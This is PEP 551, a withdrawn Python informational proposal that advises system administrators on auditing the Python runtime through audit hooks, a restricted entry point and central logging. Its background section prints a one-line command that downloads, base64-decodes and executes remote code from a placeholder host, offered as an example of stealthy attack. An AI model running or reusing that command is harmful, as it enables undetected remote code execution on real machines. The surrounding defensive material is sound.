PEP 551 – Security transparency in the Python runtime

Author:: Steve Dower <steve.dower at python.org>
Status:: Withdrawn
Type:: Informational
Created:: 23-Aug-2017
Python-Version:: 3.7
Post-History:: 24-Aug-2017, 28-Aug-2017

Table of Contents

Relationship to PEP 578
Abstract
Background
Summary Recommendations
Restricting the Entry Point
General Recommendations
Things not to do
Further Reading
References
Acknowledgments
Copyright

Note

This PEP has been withdrawn. For information about integrated CPython into a secure environment, we recommend consulting your own security experts.

Relationship to PEP 578

This PEP has been split into two since its original posting.

See PEP 578 for the auditing APIs proposed for addition to the next version of Python.

This is now an informational PEP, providing guidance to those planning to integrate Python into their secure or audited environments.

This PEP describes the concept of security transparency and how it applies to the Python runtime. Visibility into actions taken by the runtime is invaluable in integrating Python into an otherwise secure and/or monitored environment.

The audit hooks described in PEP 578 are an essential component in detecting, identifying and analyzing misuse of Python. While the hooks themselves are neutral (in that not every reported event is inherently misuse), they provide essential context to those who are responsible for monitoring an overall system or network. With enough transparency, attackers are no longer able to hide.

Background

Software vulnerabilities are generally seen as bugs that enable remote or elevated code execution. However, in our modern connected world, the more dangerous vulnerabilities are those that enable advanced persistent threats (APTs). APTs are achieved when an attacker is able to penetrate a network, establish their software on one or more machines, and over time extract data or intelligence. Some APTs may make themselves known by maliciously damaging data (e.g., WannaCrypt) or hardware (e.g., Stuxnet). Most attempt to hide their existence and avoid detection. APTs often use a combination of traditional vulnerabilities, social engineering, phishing (or spear-phishing), thorough network analysis, and an understanding of misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require special privileges. For example, an APT that is established as a non-administrative user on a developer’s machine may have the ability to spread to production machines through normal deployment channels. It is common for APTs to persist on as many machines as possible, with sheer weight of presence making them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the biggest barrier to detection is a lack of insight. System administrators with large networks rely on distributed logs to understand what their machines are doing, but logs are often filtered to show only error conditions. APTs that are attempting to avoid detection will rarely generate errors or abnormal events. Reviewing normal operation logs involves a significant amount of effort, though work is underway by a number of companies to enable automatic anomaly detection within operational logs. The tools preferred by attackers are ones that are already installed on the target machines, since log messages from these tools are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the existence of APTs or methods and mitigations that do not apply to this PEP. For further information about the field, we recommend reading or watching the resources listed under Further Reading.

Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal auditing. This allows attackers to download, decrypt, and execute malicious code with a single command:

python -c "import urllib.request, base64;
    exec(base64.b64decode(
        urllib.request.urlopen('http://my-exploit/py.b64')
    ).decode())"

This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

General consensus among the security community is that totally preventing attacks is infeasible and defenders should assume that they will often detect attacks only after they have succeeded. This is known as the “assume breach” mindset. [1] In this scenario, protections such as sandboxing and input validation have already failed, and the important task is detection, tracking, and eventual removal of the malicious code. To this end, the primary feature required from Python is security transparency: the ability to see what operations the Python runtime is performing that may indicate anomalous or malicious use. Preventing such use is valuable, but secondary to the need to know that it is occurring.

To summarise the goals in order of increasing importance:

preventing malicious use is valuable
detecting malicious use is important
detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is PowerShell, which has recently been enhanced towards similar goals of transparency and prevention. [2]

Generally, application and system configuration will determine which events within a scripting engine are worth logging. However, given the value of many logs events are not recognized until after an attack is detected, it is important to capture as much as possible and filter views rather than filtering at the source (see the No Easy Breach video from Further Reading). Events that are always of interest include attempts to bypass auditing, attempts to load and execute code that is not correctly signed or access-controlled, use of uncommon operating system functionality such as debugging or inter-process inspection tools, most network access and DNS resolution, and attempts to create and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in order to detect abnormal or malicious usage. With PEP 578, the Python runtime gains the ability to provide this. The aim of this PEP is to assist system administrators with deploying a security transparent version of Python that can integrate with their existing auditing and protection systems.

On Windows, some specific features that may be integrated through the hooks added by PEP 578 include:

Script Block Logging [3]
DeviceGuard [4]
AMSI [5]
Persistent Zone Identifiers [6]
Event tracing (which includes event forwarding) [7]

On Linux, some specific features that may be integrated are:

gnupg [8]
sd_journal [9]
OpenBSM [10]
syslog [11]
auditd [12]
SELinux labels [13]
check execute bit on imported modules

On macOS, some features that may be integrated are:

OpenBSM [10]
syslog [11]

Overall, the ability to enable these platform-specific features on production machines is highly appealing to system administrators and will make Python a more trustworthy dependency for application developers.

True security transparency is not fully achievable by Python in isolation. The runtime can audit as many events as it likes, but unless the logs are reviewed and analyzed there is no value. Python may impose restrictions in the name of security, but usability may suffer. Different platforms and environments will require different implementations of certain security features, and organizations with the resources to fully customize their runtime should be encouraged to do so.

Summary Recommendations

These are discussed in greater detail in later sections, but are presented here to frame the overall discussion.

Sysadmins should provide and use an alternate entry point (besides python.exe or pythonX.Y) in order to reduce surface area and securely enable audit hooks. A discussion of what could be restricted is below in Restricting the Entry Point.

Sysadmins should use all available measures provided by their operating system to prevent modifications to their Python installation, such as file permissions, access control lists and signature validation.

Sysadmins should log everything and collect logs to a central location as quickly as possible - avoid keeping logs on outer-ring machines.

Sysadmins should prioritize _detection_ of misuse over _prevention_ of misuse.

Restricting the Entry Point

One of the primary vulnerabilities exposed by the presence of Python on a machine is the ability to execute arbitrary code without detection or verification by the system. This is made significantly easier because the default entry point (python.exe on Windows and pythonX.Y on other platforms) allows execution from the command line, from standard input, and does not have any hooks enabled by default.

Our recommendation is that production machines should use a modified entry point instead of the default. Once outside of the development environment, there is rarely a need for the flexibility offered by the default entry point.

In this section, we describe a hypothetical spython entry point (spython.exe on Windows; spythonX.Y on other platforms) that provides a level of security transparency recommended for production machines. An associated example implementation shows many of the features described here, though with a number of concessions for the sake of avoiding platform-specific code. A sufficient implementation will inherently require some integration with platform-specific security features.

Official distributions will not include any spython by default, but third party distributions may include appropriately modified entry points that use the same name.

Remove most command-line arguments

The spython entry point requires a script file be passed as the first argument, and does not allow any options to precede it. This prevents arbitrary code execution from in-memory data or non-script files (such as pickles, which could be executed using -m pickle <path>.

Options -B (do not write bytecode), -E (ignore environment variables) and -s (no user site) are assumed.

If a file with the same full path as the process with a ._pth suffix (spython._pth on Windows, spythonX.Y._pth on Linux) exists, it will be used to initialize sys.path following the rules currently described for Windows.

For the sake of demonstration, the example implementation of spython also allows the -i option to start in interactive mode. This is not recommended for restricted entry points.

Log audited events

Before initialization, spython sets an audit hook that writes all audited events to an OS-managed log file. On Windows, this is the Event Tracing functionality,[7]_ and on other platforms they go to syslog.[11]_ Logs are copied from the machine as frequently as possible to prevent loss of information should an attacker attempt to clear local logs or prevent legitimate access to the machine.

The audit hook will also abort all sys.addaudithook events, preventing any other hooks from being added.

The logging hook is written in native code and configured before the interpreter is initialized. This is the only opportunity to ensure that no Python code executes without auditing, and that Python code cannot prevent registration of the hook.

Our primary aim is to record all actions taken by all Python processes, so that detection may be performed offline against logged events. Having all events recorded also allows for deeper analysis and the use of machine learning algorithms. These are useful for detecting persistent attacks, where the attacker is intending to remain within the protected machines for some period of time, as well as for later analysis to determine the impact and exposure caused by a successful attack.

The example implementation of spython writes to a log file on the local machine, for the sake of demonstration. When started with -i, the example implementation writes all audit events to standard error instead of the log file. The SPYTHONLOG environment variable can be used to specify the log file location.

Restrict importable modules

Also before initialization, spython sets an open-for-import hook that validates all files opened with os.open_for_import. This implementation requires all files to have a .py suffix (preventing the use of cached bytecode), and will raise a custom audit event spython.open_for_import containing (filename, True_if_allowed).

After opening the file, the entire contents is read into memory in a single buffer and the file is closed.

Compilation will later trigger a compile event, so there is no need to validate the contents now using mechanisms that also apply to dynamically generated code. However, if a whitelist of source files or file hashes is available, then other validation mechanisms such as DeviceGuard [4] should be performed here.

Restrict globals in pickles

The spython entry point will abort all pickle.find_class events that use the default implementation. Overrides will not raise audit events unless explicitly added, and so they will continue to be allowed.

Prevent os.system

The spython entry point aborts all os.system calls.

It should be noted here that subprocess.Popen(shell=True) is allowed (though logged via the platform-specific process creation events). This tradeoff is made because it is much simpler to induce a running application to call os.system with a single string argument than a function with multiple arguments, and so it is more likely to be used as part of an exploit. There is also little justification for using os.system in production code, while subprocess.Popen has a large number of legitimate uses. Though logs indicating the use of the shell=True argument should be more carefully scrutinised.

Sysadmins are encouraged to make these kinds of tradeoffs between restriction and detection, and generally should prefer detection.

General Recommendations

Recommendations beyond those suggested in the previous section are difficult, as the ideal configuration for any environment depends on the sysadmin’s ability to manage, monitor, and respond to activity on their own network. Nonetheless, here we attempt to provide some context and guidance for integrating Python into a complete system.

This section provides recommendations using the terms should (or should not), indicating that we consider it risky to ignore the advice, and may, indicating that for the advice ought to be considered for high value systems. The term sysadmin refers to whoever is responsible for deploying Python throughout the network; different organizations may have an alternative title for the responsible people.

Sysadmins should build their own entry point, likely starting from the spython source, and directly interface with the security systems available in their environment. The more tightly integrated, the less likely a vulnerability will be found allowing an attacker to bypass those systems. In particular, the entry point should not obtain any settings from the current environment, such as environment variables, unless those settings are otherwise protected from modification.

Audit messages should not be written to a local file. The spython entry point does this for example and testing purposes. On production machines, tools such as ETW [7] or auditd [12] that are intended for this purpose should be used.

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Python deployments should be made read-only using any available platform functionality after deployment and during use.

On platforms that support it, sysadmins should include signatures for every file in a Python deployment, ideally verified using a private certificate. For example, Windows supports embedding signatures in executable files and using catalogs for others, and can use DeviceGuard [4] to validate signatures either automatically or using an open_for_import hook.

Sysadmins should log as many audited events as possible, and should copy logs off of local machines frequently. Even if logs are not being constantly monitored for suspicious activity, once an attack is detected it is too late to enable auditing. Audit hooks should not attempt to preemptively filter events, as even benign events are useful when analyzing the progress of an attack. (Watch the “No Easy Breach” video under Further Reading for a deeper look at this side of things.)

Most actions should not be aborted if they could ever occur during normal use or if preventing them will encourage attackers to work around them. As described earlier, awareness is a higher priority than prevention. Sysadmins may audit their Python code and abort operations that are known to never be used deliberately.

Audit hooks should write events to logs before attempting to abort. As discussed earlier, it is more important to record malicious actions than to prevent them.

Sysadmins should identify correlations between events, as a change to correlated events may indicate misuse. For example, module imports will typically trigger the import auditing event, followed by an open_for_import call and usually a compile event. Attempts to bypass auditing will often suppress some but not all of these events. So if the log contains import events but not compile events, investigation may be necessary.

The first audit hook should be set in C code before Py_Initialize is called, and that hook should unconditionally abort the sys.addloghook event. The Python interface is primarily intended for testing and development.

To prevent audit hooks being added on non-production machines, an entry point may add an audit hook that aborts the sys.addloghook event but otherwise does nothing.

On production machines, a non-validating open_for_import hook may be set in C code before Py_Initialize is called. This prevents later code from overriding the hook, however, logging the setopenforexecutehandler event is useful since no code should ever need to call it. Using at least the sample open_for_import hook implementation from spython is recommended.

Since importlib’s use of open_for_import may be easily bypassed with monkeypatching, an audit hook should be used to detect attribute changes on type objects.

Things not to do

This section discusses common or “obviously good” recommendations that we are specifically not making. These range from useless or incorrect through to ideas that are simply not feasible in any real world environment.

Do not attempt to implement a sandbox within the Python runtime. There is a long history of attempts to allow arbitrary code limited use of Python features (such as [14]), but no general success. The best options are to run unrestricted Python within a sandboxed environment with at least hypervisor-level isolation, or to prevent unauthorised code from starting at all.

Do not rely on static analysis to verify untrusted code before use. The best options are to pre-authorise trusted code, such as with code signing, and if not possible to identify known-bad code, such as with an anti-malware scanner.

Do not use audit hooks to abort operations without logging the event first. You will regret not knowing why your process disappeared.

[TODO - more bad advice]

References

Acknowledgments

Thanks to all the people from Microsoft involved in helping make the Python runtime safer for production use, and especially to James Powell for doing much of the initial research, analysis and implementation, Lee Holmes for invaluable insights into the info-sec field and PowerShell’s responses, and Brett Cannon for the restraining and grounding discussions.

Copyright

Copyright (c) 2017-2018 by Microsoft Corporation. This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/).